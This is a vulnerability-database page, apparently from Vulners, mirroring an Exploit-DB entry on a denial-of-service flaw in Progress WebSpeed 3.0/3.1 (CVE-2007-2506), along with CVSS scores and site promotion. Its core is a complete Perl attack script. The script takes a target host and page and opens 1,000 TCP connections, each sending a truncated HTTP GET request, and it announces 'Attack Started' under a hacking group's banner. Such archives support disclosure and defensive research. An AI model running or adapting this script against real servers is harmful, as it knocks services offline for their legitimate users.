Lucene search
+L

Progress WebSpeed 3.0/3.1 - Denial of Service

🗓️ 02 May 2007 00:00:00Reported by Eelko NevenType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

WebSpeed 3.0/3.1 Denial of Service vulnerability due to input sanitization failur

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-2506
4 May 200701:00
cve
cvelist
Cvelist
CVE-2007-2506
4 May 200701:00
cvelist
euvd
EUVD
EUVD-2007-2499
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-2506
4 May 200701:19
nvd
prion
Prion
Code injection
4 May 200701:19
prion
//source: https://www.securityfocus.com/bid/23778/info
//
//WebSpeed is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.
//
//Successful exploits can allow attackers to cause the application to become unresponsive, denying service to legitimate users.

if(!$ARGV[0]){
        print "U.LP.O.W\n";
        print "www.ulpow.net\n";
        print "The Eliminators of the Web\n";
        print "Usage:perl webspeed.pl targetsite targetpage\n";

} else {

$site = $ARGV[0];
$page = $ARGV[1];

print "Attack Started\n";

$ish=1;

do {
$ish++;
use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $site,
PeerPort => 80,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Couldn't Connect to target please check again
address!\n";
print $socket "GET $page HTTP/1.0\r\n";
close($socket);
} while ($ish < 1000);

print ":-; Attack Complete\n";
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Nov 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.8
EPSS0.03967
32